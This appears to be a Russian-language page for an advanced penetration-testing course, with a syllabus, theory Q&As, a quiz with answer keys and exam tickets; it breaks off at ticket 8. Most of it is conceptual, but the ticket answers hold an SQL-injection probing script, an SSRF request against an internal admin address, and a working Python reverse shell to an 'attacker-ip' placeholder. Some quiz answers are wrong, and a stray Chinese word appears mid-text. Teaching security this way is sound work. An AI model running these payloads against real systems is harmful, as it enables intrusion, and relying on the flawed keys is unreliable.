Тестировщик безопасности (профессиональный уровень)
Описание:
Курс для опытных специалистов, углубляющийся в advanced pentesting, анализ и эксплуатацию сложных уязвимостей, включая 0-day и APT-тактики. Акцент на практику: от криптографии до обхода современных систем защиты.
Что предстоит пройти:
-
Продвинутый пентест:
— Фаззинг, реверс-инжиниринг, эксплуатация memory corruption (Heap/Stack Overflow, UAF).
— Обход WAF, EDR, ASLR, DEP. -
Криптография:
— Атаки на реализацию (Side-channel, Padding Oracle). -
Сетевые атаки:
— MITM, VLAN Hopping, эксплуатация протоколов (DNS, BGP). -
Web/API Security:
— Logic flaws, SSRF, десериализация, JWT-атаки. -
Red Team:
— Пост-эксплуатация, persistence, симуляция APT.
Ожидаемые результаты:
▪ Должен уметь:
— Эксплуатировать уязвимости в enterprise-средах.
— Проводить security research (fuzzing, reverse).
— Разрабатывать PoC для сложных векторов.
▪ Должен знать:
— Современные механизмы защиты и методы их обхода.
— Тактики APT-групп и противодействие Forensics.
Важное:
Сертификация: Подготовка к OSCP/OSED и внутреннему экзамену (CTF + реальный пентест).
Формат: 60% практики (лабы, VulnBox), 40% теории.
-
Что такое SQL-инъекция и как она работает?
SQL-инъекция - это атака, при которой злоумышленник внедряет вредоносный SQL-код через пользовательский ввод. Работает через уязвимости в приложениях, которые некорректно обрабатывают пользовательские данные перед их использованием в SQL-запросах. -
Какие существуют типы XSS-атак?
Существует три основных типа XSS: Reflected (отраженный), Stored (постоянный) и DOM-based. Reflected XSS возникает, когда скрипт отражается от веб-сервера, Stored сохраняется на сервере, а DOM-based выполняется полностью на стороне клиента. -
Как работает CSRF-атака?
CSRF (Cross-Site Request Forgery) заставляет браузер жертвы выполнять нежелательные действия на доверенном сайте, где пользователь аутентифицирован. Атакующий создает специальную веб-страницу или ссылку, которая автоматически отправляет запрос от имени пользователя. -
Что такое SSRF и чем он опасен?
SSRF (Server-Side Request Forgery) позволяет атакующему заставить сервер делать запросы к внутренним ресурсам. Опасен тем, что может привести к доступу к внутренним системам, обходу firewall и чтению конфиденциальных данных. -
Как работает атака XXE?
XXE (XML External Entity) использует обработку внешних сущностей в XML-документах. Атакующий может читать локальные файлы, выполнять SSRF-атаки или вызывать отказ в обслуживании через специально сформированные XML-документы. -
Что такое Buffer Overflow?
Buffer Overflow - это переполнение буфера, когда программа записывает данные за пределы выделенной памяти. Это может привести к выполнению произвольного кода, краху программы или изменению поведения приложения. -
Какие механизмы защиты от переполнения буфера существуют?
Основные механизмы защиты: DEP (Data Execution Prevention), ASLR (Address Space Layout Randomization), Stack Canaries и Control Flow Guard. DEP предотвращает выполнение кода в области данных, ASLR рандомизирует адреса памяти. -
Как работает атака MITM?
MITM (Man-in-the-Middle) - это перехват и возможная модификация трафика между двумя сторонами. Атакующий позиционирует себя между жертвой и сервером, получая доступ ко всей передаваемой информации. -
Что такое ARP Spoofing?
ARP Spoofing - это техника, при которой атакующий отправляет поддельные ARP-сообщения в локальную сеть, чтобы связать свой MAC-адрес с IP-адресом другого узла. Это позволяет перехватывать трафик, предназначенный для этого узла. -
Как защититься от ARP Spoofing?
Защитные меры включают: использование статических ARP-таблиц, внедрение DHCP snooping, применение портовой безопасности на коммутаторах, использование VPN и реализацию ARP-мониторинга с детектированием аномалий. -
Что такое JWT и какие уязвимости в нем возможны?
JWT (JSON Web Token) - это стандарт для создания токенов доступа. Уязвимости: слабый секретный ключ, использование алгоритма "none", инъекция в заголовки, отсутствие проверки подписи и неограниченное время жизни токена. -
Как работает OAuth 2.0?
OAuth 2.0 - это протокол авторизации, позволяющий приложениям получать ограниченный доступ к учетным записям пользователей. Работает через выдачу токенов доступа вместо передачи учетных данных, поддерживая несколько потоков авторизации. -
Что такое Docker breakout?
Docker breakout - это техника выхода из контейнера на хост-систему. Может быть реализована через уязвимости в ядре, неправильную конфигурацию или злоупотребление возможностями контейнера. -
Какие основные угрозы безопасности в Kubernetes?
Основные угрозы: чрезмерные разрешения подов, уязвимости в etcd, небезопасные сетевые политики, утечки секретов через переменные окружения и неконтролируемый доступ к API Kubernetes. -
Что такое Active Directory и основные векторы атак?
Active Directory - служба каталогов Microsoft. Основные векторы атак: Pass-the-Hash, Golden Ticket, Silver Ticket, DCSync, Kerberoasting и атаки на групповые политики. -
Как работает атака Pass-the-Hash?
Pass-the-Hash позволяет атакующему аутентифицироваться на удаленной системе, используя хэш пароля, без его расшифровки. Работает благодаря тому, что Windows использует хэши для аутентификации. -
Что такое WAF и как его обойти?
WAF (Web Application Firewall) - это система защиты веб-приложений. Обход возможен через: кодирование payload, фрагментацию атаки, использование альтернативных синтаксических конструкций и эксплуатацию временных окон. -
Какие уязвимости характерны для GraphQL?
Основные уязвимости: чрезмерно сложные запросы (DoS), инъекции через аргументы, неправильная настройка прав доступа, утечка данных через introspection и проблемы с кэшированием. -
Что такое API Security?
API Security - это практики защиты интерфейсов программирования приложений. Включает: аутентификацию, авторизацию, валидацию входных данных, ограничение частоты запросов и мониторинг аномальной активности. -
Какие основные риски в облачной безопасности?
Основные риски: неправильная конфигурация сервисов, чрезмерные IAM-разрешения, уязвимости в multi-tenancy архитектуре, утечки данных и недостаточный мониторинг активности. -
Что такое Threat Intelligence?
Threat Intelligence - это сбор и анализ информации о киберугрозах. Включает тактики, техники и процедуры (TTPs) злоумышленников, индикаторы компрометации (IOCs) и контекст угроз. -
Как работает модель Kill Chain?
Модель Kill Chain описывает 7 этапов кибератаки: разведка, создание оружия, доставка, эксплуатация, установка, командование и контроль, действия по достижению целей. -
Что такое Red Teaming?
Red Teaming - это реалистичная симуляция атак для оценки безопасности организации. Отличается от пентеста более комплексным подходом, имитирующим реальных APT-группировок. -
Какие этапы включает классический пентест?
Основные этапы: планирование и разведка, сканирование, получение доступа, поддержание доступа, анализ и зачистка следов, составление отчета. -
Что такое OSINT и какие инструменты используются?
OSINT (Open Source Intelligence) - сбор информации из открытых источников. Инструменты: Maltego, theHarvester, Shodan, SpiderFoot, Recon-ng и Google Dorks. -
Как работает методология MITRE ATT&CK?
MITRE ATT&CK - это матрица тактик и техник, используемых злоумышленниками. Включает 14 тактических категорий (Initial Access, Execution, Persistence и др.) и сотни конкретных техник. -
Что такое DevSecOps?
DevSecOps - это интеграция практик безопасности в процессы разработки и эксплуатации. Основные принципы: автоматизация security-тестов, "security as code", непрерывный мониторинг безопасности. -
Как работает принцип "Shift Left" в безопасности?
"Shift Left" означает перенос security-практик на более ранние этапы SDLC. Включает: статический анализ кода, проверки зависимостей, security-ревью кода и автоматизированное тестирование. -
Что такое SAST и DAST?
SAST (Static Application Security Testing) - анализ исходного кода на уязвимости. DAST (Dynamic Application Security Testing) - тестирование работающего приложения через внешние интерфейсы. -
Как работает IAST?
IAST (Interactive Application Security Testing) сочетает SAST и DAST, работая внутри приложения во время его выполнения. Анализирует поток данных и выполнение кода в реальном времени. -
Что такое SCA?
SCA (Software Composition Analysis) - анализ сторонних компонентов и зависимостей на известные уязвимости. Помогает выявлять проблемы в используемых библиотеках и фреймворках. -
Какие существуют стандарты безопасности приложений?
Основные стандарты: OWASP Top 10, SANS Top 25, PCI DSS, ISO 27001, NIST SP 800-115 и CIS Benchmarks. -
Что такое CVE и CVSS?
CVE (Common Vulnerabilities and Exposures) - система идентификации уязвимостей. CVSS (Common Vulnerability Scoring System) - метод оценки серьезности уязвимостей по шкале от 0 до 10. -
Как работает система bug bounty?
Bug bounty - это программа вознаграждения за обнаружение уязвимостей. Исследователи сообщают об уязвимостях, а компании выплачивают вознаграждения в зависимости от серьезности найденных проблем. -
Что такое Zero-Day уязвимость?
Zero-Day - это уязвимость, неизвестная вендору и не имеющая патча. Особо опасна, так как может эксплуатироваться до того, как будет выпущено исправление. -
Как работает атака на цепочку поставок?
Атака на цепочку поставок (Supply Chain Attack) нацелена на уязвимости в сторонних компонентах или процессах разработки. Примеры: компрометация обновлений ПО или заражение библиотек. -
Что такое APT?
APT (Advanced Persistent Threat) - это целевые, сложные и продолжительные кибератаки, обычно проводимые государственными или хорошо финансируемыми группами. -
Как работает атака на DNS?
DNS-атаки включают: кэш-отравление, спуфинг, амплификацию для DDoS и захват доменов. Могут приводить к перенаправлению трафика или фишингу. -
Что такое DDoS и какие типы существуют?
DDoS (Distributed Denial of Service) - атака на доступность. Типы: объемные (UDP flood), протокольные (SYN flood) и прикладные (HTTP flood). -
Как защититься от DDoS?
Защита включает: фильтрацию тракта, использование CDN, ограничение запросов, blackholing, Anycast и специализированные DDoS-решения. -
Что такое криптография и основные алгоритмы?
Криптография - наука о защите информации. Алгоритмы: симметричные (AES), асимметричные (RSA), хеши (SHA-256) и протоколы (TLS). -
Как работает TLS?
TLS (Transport Layer Security) обеспечивает защищенную передачу данных. Включает handshake для аутентификации и согласования ключей, затем симметричное шифрование трафика. -
Что такое PKI?
PKI (Public Key Infrastructure) - инфраструктура открытых ключей. Включает центры сертификации (CA), регистрационные центры (RA), списки отзыва (CRL) и хранилища сертификатов. -
Как работает атака на криптосистемы?
Атаки включают: brute force, side-channel атаки, криптоанализ и эксплуатацию уязвимостей в реализации алгоритмов. -
Что такое HSM?
HSM (Hardware Security Module) - аппаратный модуль для безопасного хранения криптографических ключей и выполнения операций. Обеспечивает физическую защиту ключей. -
Как работает биометрическая аутентификация?
Биометрия использует уникальные характеристики (отпечатки, лицо, голос). Проблемы: ложные срабатывания, невозможность смены "пароля" и риски утечки биометрических данных. -
Что такое MFA?
MFA (Multi-Factor Authentication) - многофакторная аутентификация. Сочетает: что-то известное (пароль), что-то имеемое (токен) и что-то присущее (биометрия). -
Как работают атаки на IoT?
Атаки на IoT включают: эксплуатацию дефолтных учеток, перехват беспроводного трафика, атаки на прошивки и использование в ботнетах. -
Что такое SCADA и какие угрозы?
SCADA - системы промышленного контроля. Угрозы: устаревшее ПО, отсутствие сегментации, слабая аутентификация и физический доступ к оборудованию. -
Как защитить промышленные системы?
Защита включает: сегментацию сетей, whitelisting приложений, мониторинг аномалий, регулярные обновления и обучение персонала. -
Что такое мобильные угрозы?
Основные угрозы: вредоносные приложения, фишинг, эксплойты для ОС, перехват трафика и кража данных с потерянных устройств. -
Как работает анализ мобильных приложений?
Анализ включает: декомпиляцию, изучение манифеста, проверку хранилища данных, анализ сетевого взаимодействия и тестирование бинарных защит. -
Что такое OWASP Mobile Top 10?
Это список критичных уязвимостей мобильных приложений, включая: некорректную аутентификацию, небезопасное хранение данных и недостаточную защиту API. -
Как работают атаки на беспроводные сети?
Атаки включают: взлом WPA2, Evil Twin, перехват трафика и эксплуатацию уязвимостей в протоколах беспроводной связи. -
Что такое RFID-атаки?
Атаки на системы радиочастотной идентификации: клонирование карт, перехват сигнала, подделка меток и DoS на считыватели. -
Как работает социальная инженерия?
Социальная инженерия манипулирует людьми для получения доступа к информации. Методы: фишинг, претекстинг, baiting и quid pro quo. -
Что такое фишинг и его разновидности?
Фишинг - мошенничество для кражи учетных данных. Разновидности: spear phishing (целевой), whaling (на топ-менеджмент), smishing (SMS) и vishing (голосовой). -
Как работают атаки на блокчейн?
Атаки включают: 51% атаку, эксплуатацию смарт-контрактов, атаки на кошельки и злоупотребление механизмами консенсуса. -
Что такое смарт-контракты и их уязвимости?
Смарт-контракты - программы на блокчейне. Уязвимости: reentrancy, integer overflow, неправильная проверка прав и front-running. -
Как работает атака Reentrancy?
Reentrancy позволяет повторно вызывать функцию до завершения предыдущего вызова. Классический пример - взлом DAO в Ethereum. -
Что такое криптоджекинг?
Криптоджекинг - несанкционированное использование вычислительных ресурсов для майнинга криптовалют. Часто реализуется через веб-скрипты или вредоносное ПО. -
Как работают атаки на виртуализацию?
Атаки включают: VM escape (выход из виртуальной машины), hyperjacking, перехват трафика между VM и эксплуатацию уязвимостей гипервизора. -
Что такое контейнерные угрозы?
Угрозы включают: breakout из контейнера, небезопасные образы, чрезмерные привилегии, утечки секретов и неконтролируемый доступ к API. -
Как защитить контейнеры?
Защита включает: минимальные привилегии, сканирование образов, runtime-защиту, сетевую сегментацию и мониторинг активности. -
Что такое серверные угрозы?
Основные угрозы: эксплуатация уязвимостей, brute force, privilege escalation, backdoors и небезопасные конфигурации. -
Как работает атака Pass-the-Ticket?
Pass-the-Ticket использует украденные Kerberos-билеты для доступа к ресурсам без знания пароля. Вариант атаки на Active Directory. -
Что такое лог-анализ для безопасности?
Анализ логов помогает выявлять аномалии и инциденты. Включает: корреляцию событий, поиск IOC и мониторинг подозрительной активности. -
Как работает SIEM?
SIEM (Security Information and Event Management) собирает и анализирует данные из различных источников для выявления угроз. Основные функции: сбор логов, корреляция событий и генерация алертов. -
Что такое EDR?
EDR (Endpoint Detection and Response) - решения для мониторинга и реагирования на угрозы на конечных точках. Включают: поведенческий анализ, расследование инцидентов и автоматизированный ответ. -
Как работает threat hunting?
Threat hunting - активный поиск угроз в инфраструктуре. Основан на гипотезах, использует анализ логов, метаданных и поведенческих аномалий. -
Что такое инцидент-респонс?
Инцидент-респонс - процесс реагирования на киберинциденты. Этапы: подготовка, обнаружение, сдерживание, ликвидация, восстановление и извлечение уроков. -
Как работает цифровая криминалистика?
Цифровая криминалистика включает: сбор доказательств, анализ дисков, исследование памяти, восстановление данных и документирование цепочки доказательств. -
Что такое стандарты реагирования на инциденты?
Основные стандарты: NIST SP 800-61, ISO 27035 и SANS Incident Handling Process. Описывают лучшие практики реагирования на инциденты. -
Как работает киберстрахование?
Киберстрахование покрывает убытки от киберинцидентов. Учитывает: меры безопасности организации, историю инцидентов и потенциальные риски. -
Что такое этичный хакинг?
Этичный хакинг - легальное тестирование безопасности с согласия владельца системы. Цель - выявление уязвимостей до того, как их найдут злоумышленники.
1. Какой метод чаще всего используется для эксплуатации SQL-инъекции типа Blind?
A) Time-based атака
B) XSS-вектор
C) CSRF-токен
D) DNS-экфильтрация
✅ Ответ: A) Time-based атака
2. Какой инструмент применяется для фаззинга бинарных приложений?
A) Burp Suite
B) AFL (American Fuzzy Lop)
C) Nmap
D) Metasploit
✅ Ответ: B) AFL (American Fuzzy Lop)
3. Какой тип атаки использует уязвимость "Use-After-Free"?
A) SQL-инъекция
B) Memory corruption
C) CSRF
D) SSRF
✅ Ответ: B) Memory corruption
4. Какой протокол уязвим к атаке "VLAN Hopping"?
A) HTTP
B) DNS
C) 802.1Q
D) FTP
✅ Ответ: C) 802.1Q
5. Какой механизм защиты предотвращает выполнение кода в области памяти, помеченной как "только для данных"?
A) ASLR
B) DEP
C) WAF
D) HSTS
✅ Ответ: B) DEP
6. Какой инструмент используется для анализа трафика в локальной сети?
A) Wireshark
B) John the Ripper
C) Hydra
D) Sqlmap
✅ Ответ: A) Wireshark
7. Какой тип атаки позволяет обойти аутентификацию через подделку HTTP-заголовков?
A) XSS
B) CSRF
C) Request Smuggling
D) LDAP-инъекция
✅ Ответ: C) Request Smuggling
8. Какой метод используется для эксплуатации уязвимости "Server-Side Request Forgery" (SSRF)?
A) Перенаправление запросов на внутренние сервисы
B) Подмена сессионных куки
C) SQL-инъекция
D) Фаззинг API
✅ Ответ: A) Перенаправление запросов на внутренние сервисы
9. Какой алгоритм хеширования считается уязвимым к "радужным таблицам"?
A) SHA-256
B) bcrypt
C) MD5
D) Argon2
✅ Ответ: C) MD5
10. Какой механизм в современных ОС рандомизирует адреса загрузки библиотек?
A) DEP
B) ASLR
C) Stack Canary
D) Control Flow Guard
✅ Ответ: B) ASLR
11. Какая уязвимость позволяет злоумышленнику выполнить произвольный код через переполнение буфера?
A) XSS
B) Buffer Overflow
C) CSRF
D) Directory Traversal
✅ Ответ: B) Buffer Overflow
12. Какой инструмент используется для автоматического поиска SQL-инъекций?
A) Nmap
B) Sqlmap
C) Metasploit
D) Aircrack-ng
✅ Ответ: B) Sqlmap
13. Какой метод защиты предотвращает атаки типа "Cross-Site Request Forgery" (CSRF)?
A) CAPTCHA
B) CSRF-токены
C) HTTP Only cookies
D) HSTS
✅ Ответ: B) CSRF-токены
14. Как называется атака, при которой злоумышленник перехватывает и изменяет данные между двумя сторонами?
A) XSS
B) MITM
C) DoS
D) Phishing
✅ Ответ: B) MITM
15. Какой алгоритм шифрования использует асимметричную криптографию?
A) AES
B) RSA
C) SHA-256
D) HMAC
✅ Ответ: B) RSA
16. Какой тип атаки использует поддельные DNS-записи для перенаправления трафика?
A) DNS Spoofing
B) ARP Poisoning
C) SQL-инъекция
D) Brute Force
✅ Ответ: A) DNS Spoofing
17. Какой инструмент применяется для перебора паролей?
A) Wireshark
B) Hydra
C) Burp Suite
D) John the Ripper
✅ Ответ: B) Hydra
18. Какой механизм защиты предотвращает выполнение кода в стеке?
A) ASLR
B) DEP
C) Stack Canary
D) WAF
✅ Ответ: C) Stack Canary
19. Какой протокол уязвим к атаке "ARP Spoofing"?
A) HTTP
B) DNS
C) ARP
D) FTP
✅ Ответ: C) ARP
20. Какой тип атаки использует уязвимости в веб-приложениях для выполнения JavaScript на стороне клиента?
A) CSRF
B) XSS
C) SSRF
D) SQL-инъекция
✅ Ответ: B) XSS
21. Какой инструмент используется для анализа и эксплуатации уязвимостей в веб-приложениях?
A) Nmap
B) Burp Suite
C) Aircrack-ng
D) GDB
✅ Ответ: B) Burp Suite
22. Какой механизм защиты предотвращает подделку межсайтовых запросов?
A) CORS
B) CSP
C) HSTS
D) CSRF-токены
✅ Ответ: D) CSRF-токены
23. Какой тип атаки направлен на перегрузку сервера запросами?
A) MITM
B) DoS
C) XSS
D) SQL-инъекция
✅ Ответ: B) DoS
24. Какой алгоритм хеширования рекомендуется для хранения паролей?
A) MD5
B) SHA-1
C) bcrypt
D) AES
✅ Ответ: C) bcrypt
25. Какой инструмент используется для взлома беспроводных сетей?
A) Wireshark
B) Aircrack-ng
C) Hydra
D) Sqlmap
✅ Ответ: B) Aircrack-ng
26. Какой механизм защиты рандомизирует адреса памяти?
A) DEP
B) ASLR
C) WAF
D) HIPS
✅ Ответ: B) ASLR
27. Какой тип атаки использует поддельные электронные письма для кражи данных?
A) Phishing
B) XSS
C) CSRF
D) SSRF
✅ Ответ: A) Phishing
28. Какой протокол уязвим к атаке "Heartbleed"?
A) HTTP
B) FTP
C) OpenSSL
D) DNS
✅ Ответ: C) OpenSSL
29. Какой инструмент используется для реверс-инжиниринга?
A) IDA Pro
B) Nmap
C) Metasploit
D) Wireshark
✅ Ответ: A) IDA Pro
30. Какой тип атаки использует уязвимости в системе управления сессиями?
A) Session Fixation
B) Buffer Overflow
C) DNS Spoofing
D) ARP Poisoning
✅ Ответ: A) Session Fixation
31. Какой тип атаки позволяет получить несанкционированный доступ к системе, используя физическое устройство?
A) Social Engineering
B) Evil Twin
C) Bad USB
D) DNS Cache Poisoning
✅ Ответ: C) Bad USB
32. Какой инструмент используется для создания фишинговых страниц?
A) SET (Social Engineering Toolkit)
B) Nmap
C) Wireshark
D) GDB
✅ Ответ: A) SET (Social Engineering Toolkit)
33. Какой механизм защиты предотвращает подделку электронной почты?
A) SPF
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) SPF
34. Какой тип атаки использует уязвимости в протоколе SMB?
A) EternalBlue
B) Heartbleed
C) Shellshock
D) Dirty COW
✅ Ответ: A) EternalBlue
35. Какой алгоритм используется для цифровых подписей?
A) RSA
B) AES
C) MD5
D) SHA-1
✅ Ответ: A) RSA
36. Какой инструмент применяется для анализа защищенности Docker-контейнеров?
A) Docker Bench
B) Lynis
C) OpenVAS
D) Nessus
✅ Ответ: A) Docker Bench
37. Какой тип атаки использует уязвимости в кэше процессора?
A) Spectre
B) Heartbleed
C) SQL-инъекция
D) XSS
✅ Ответ: A) Spectre
38. Какой протокол уязвим к атаке "KRACK"?
A) WPA2
B) SSL
C) HTTP
D) FTP
✅ Ответ: A) WPA2
39. Какой инструмент используется для сканирования уязвимостей в сети?
A) OpenVAS
B) John the Ripper
C) Hydra
D) Aircrack-ng
✅ Ответ: A) OpenVAS
40. Какой механизм защиты предотвращает выполнение кода в куках?
A) HTTP Only
B) CSRF-токены
C) CSP
D) HSTS
✅ Ответ: A) HTTP Only
41. Какой тип атаки использует уязвимости в API веб-приложений?
A) GraphQL-инъекция
B) CSRF
C) DNS Spoofing
D) ARP Poisoning
✅ Ответ: A) GraphQL-инъекция
42. Какой инструмент применяется для анализа бинарных файлов?
A) Ghidra
B) Burp Suite
C) Wireshark
D) Sqlmap
✅ Ответ: A) Ghidra
43. Какой механизм защиты предотвращает межсайтовую подделку запросов?
A) CSP
B) CORS
C) SameSite cookies
D) HSTS
✅ Ответ: C) SameSite cookies
44. Какой тип атаки использует уязвимости в системе доменных имен?
A) DNS Cache Poisoning
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) DNS Cache Poisoning
45. Какой алгоритм шифрования использует симметричную криптографию?
A) RSA
B) AES
C) ECC
D) DSA
✅ Ответ: B) AES
46. Какой инструмент используется для анализа трафика SSL/TLS?
A) SSLstrip
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: B) Wireshark
47. Какой механизм защиты предотвращает атаки типа "Clickjacking"?
A) X-Frame-Options
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) X-Frame-Options
48. Какой тип атаки использует уязвимости в системе управления версиями?
A) Git-утечки
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) Git-утечки
49. Какой инструмент применяется для анализа уязвимостей в IoT-устройствах?
A) Shodan
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) Shodan
50. Какой механизм защиты предотвращает атаки типа "DNS Spoofing"?
A) DNSSEC
B) HSTS
C) CSP
D) SameSite cookies
✅ Ответ: A) DNSSEC
51. Какой тип атаки использует уязвимости в облачных сервисах?
A) AWS S3-утечки
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) AWS S3-утечки
52. Какой инструмент используется для анализа уязвимостей в мобильных приложениях?
A) MobSF
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: A) MobSF
53. Какой механизм защиты предотвращает атаки типа "Session Hijacking"?
A) Secure cookies
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Secure cookies
54. Какой тип атаки использует уязвимости в системе виртуализации?
A) VM Escape
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) VM Escape
55. Какой алгоритм используется для создания хеш-сумм файлов?
A) SHA-256
B) RSA
C) AES
D) ECC
✅ Ответ: A) SHA-256
56. Какой инструмент применяется для анализа уязвимостей в блокчейн-сетях?
A) MythX
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) MythX
57. Какой механизм защиты предотвращает атаки типа "Directory Traversal"?
A) Input Validation
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Input Validation
58. Какой тип атаки использует уязвимости в системе управления контентом (CMS)?
A) WordPress-эксплойты
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) WordPress-эксплойты
59. Какой инструмент используется для анализа уязвимостей в API?
A) Postman
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: A) Postman
60. Какой механизм защиты предотвращает атаки типа "LDAP-инъекция"?
A) Input Sanitization
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Input Sanitization
61. Какой тип атаки использует уязвимости в системе управления базами данных?
A) NoSQL-инъекция
B) XSS
C) CSRF
D) DNS Spoofing
✅ Ответ: A) NoSQL-инъекция
62. Какой инструмент применяется для анализа уязвимостей в микросервисах?
A) OWASP ZAP
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) OWASP ZAP
63. Какой механизм защиты предотвращает атаки типа "XML External Entity (XXE)"?
A) Disable DTD
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Disable DTD
64. Какой тип атаки использует уязвимости в системе управления идентификацией?
A) OAuth-утечки
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) OAuth-утечки
65. Какой алгоритм используется для создания цифровых сертификатов?
A) RSA
B) AES
C) SHA-1
D) HMAC
✅ Ответ: A) RSA
66. Какой инструмент используется для анализа уязвимостей в серверах?
A) Lynis
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: A) Lynis
67. Какой механизм защиты предотвращает атаки типа "Server-Side Template Injection (SSTI)"?
A) Sandboxing
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Sandboxing
68. Какой тип атаки использует уязвимости в системе управления сессиями?
A) Session Prediction
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) Session Prediction
69. Какой инструмент применяется для анализа уязвимостей в облачных хранилищах?
A) CloudSploit
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) CloudSploit
70. Какой механизм защиты предотвращает атаки типа "Remote Code Execution (RCE)"?
A) Input Validation
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Input Validation
71. Какой тип атаки использует уязвимости в системе управления логированием?
A) Log Injection
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) Log Injection
72. Какой инструмент используется для анализа уязвимостей в серверах баз данных?
A) SQLMap
B) Wireshark
C) Aircrack-ng
D) Hydra
✅ Ответ: A) SQLMap
73. Какой механизм защиты предотвращает атаки типа "Cross-Origin Resource Sharing (CORS)"?
A) Proper CORS Headers
B) CSRF-токены
C) HSTS
D) DEP
✅ Ответ: A) Proper CORS Headers
74. Какой тип атаки использует уязвимости в системе управления конфигурацией?
A) Configuration Drift
B) XSS
C) SQL-инъекция
D) CSRF
✅ Ответ: A) Configuration Drift
75. Какой инструмент применяется для анализа уязвимостей в контейнерах Kubernetes?
A) Kube-hunter
B) Nmap
C) Metasploit
D) Burp Suite
✅ Ответ: A) Kube-hunter
Билет №1
Теоретическая часть:
-
Опишите механизм работы атаки "SQL-инъекция" и методы защиты от неё.
✅ Ответ:
Атака SQL-инъекции заключается во внедрении恶意 SQL-кода через пользовательский ввод.
Методы защиты:
-
Использование параметризованных запросов
-
Валидация и санитизация входных данных
-
Применение ORM
-
Что такое "Use-After-Free" и как её эксплуатируют?
✅ Ответ:
Уязвимость, возникающая при обращении к освобождённой области памяти. Эксплуатация через:
-
Перезапись указателя
-
Вызов malicious payload
Практическая часть:
Задание: Напишите Python-скрипт для обнаружения SQL-инъекции в URL-параметрах.
✅ Ответ:
import requests
def check_sql_injection(url, param):
payloads = ["'", "\"", "1' OR '1'='1"]
for payload in payloads:
test_url = f"{url}?{param}={payload}"
response = requests.get(test_url)
if "error" in response.text.lower():
print(f"Vulnerable to SQLi: {test_url}")
Билет №2
Теоретическая часть:
-
Что такое "Buffer Overflow" и какие механизмы защиты существуют?
✅ Ответ:
Переполнение буфера при записи данных за его пределы.
Защита:
-
DEP (Data Execution Prevention)
-
ASLR (Address Space Layout Randomization)
-
Опишите этапы пентеста согласно методологии OWASP.
✅ Ответ: -
Разведка
-
Анализ уязвимостей
-
Эксплуатация
-
Пост-эксплуатация
-
Отчётность
Практическая часть:
Задание: Напишите команду Nmap для обнаружения открытых портов с выводом в XML.
✅ Ответ:
nmap -sV -oX scan.xml target.com
Билет №3
Теоретическая часть:
-
Как работает атака "ARP Spoofing"?
✅ Ответ:
Подмена MAC-адреса в ARP-таблицах для перенаправления трафика через атакующего. -
Что такое "Zero-Day уязвимость"?
✅ Ответ:
Уязвимость, неизвестная вендору и не имеющая патча.
Практическая часть:
Задание: Напишите правило для Suricata для детектирования ARP-спуфинга.
✅ Ответ:
alert arp any any -> any any (msg:"ARP Spoofing Detected"; arp.opcode:1; content:"|00 01|"; sid:1000001;)
Билет №5
Теоретическая часть:
-
Объясните разницу между симметричным и асимметричным шифрованием.
✅ Ответ:
-
Симметричное: Один ключ для шифрования/дешифрования (AES)
-
Асимметричное: Пара ключей (RSA)
-
Что такое "криптостойкость" алгоритма?
✅ Ответ:
Сопротивление алгоритма взлому (например, через brute force).
Практическая часть:
Задание: Зашифруйте файл с помощью AES-256 через OpenSSL.
✅ Ответ:
openssl enc -aes-256-cbc -in file.txt -out file.enc -k passphrase
Билет №5
Теоретическая часть:
-
Что такое SSRF и какие последствия может вызывать эта уязвимость?
✅ Ответ:
Server-Side Request Forgery (SSRF) - уязвимость, позволяющая злоумышленнику выполнять запросы от имени сервера.
Последствия:
-
Доступ к внутренним системам
-
Обход firewall
-
Чтение метаданных в облачных средах
-
Какие методы обхода WAF вы знаете?
✅ Ответ:
-
Кодирование payload (URL, Unicode, Base64)
-
Разделение атаки на несколько запросов
-
Использование альтернативных синтаксических конструкций
Практическая часть:
Задание: Напишите HTTP-запрос для эксплуатации SSRF к внутреннему сервису 192.168.1.1:8080
✅ Ответ:
GET /proxy?url=http://192.168.1.1:8080/admin HTTP/1.1
Host: vulnerable.com
Билет №6
Теоретическая часть:
-
Объясните принцип работы Reverse Shell.
✅ Ответ:
Техника, при которой атакуемая система инициирует соединение к атакующему, обходя firewall.
Этапы: -
Атакующий слушает порт
-
Жертва подключается к нему
-
Получение shell-доступа
-
Как защититься от MITM-атак?
✅ Ответ:
-
Использование VPN/SSL
-
Проверка сертификатов
-
Отключение небезопасных протоколов (SSLv2, SSLv3)
Практическая часть:
Задание: Создайте Reverse Shell на Python.
✅ Ответ:
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker-ip",4444))
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
Билет №7
Теоретическая часть:
-
Какие уязвимости возможны в JWT?
✅ Ответ:
-
Подбор секретного ключа (brute force)
-
Алгоритм "none"
-
Подделка заголовка (alg: HS256 → RS256)
-
Какие угрозы безопасности существуют для Docker?
✅ Ответ:
-
Breakout через уязвимости ядра
-
Небезопасные конфигурации
-
Утечки чувствительных данных
Практическая часть:
Задание: Напишите команду для проверки Docker-контейнера на уязвимости.
✅ Ответ:
docker scan my-container
Билет №8
Теоретическая часть:
-
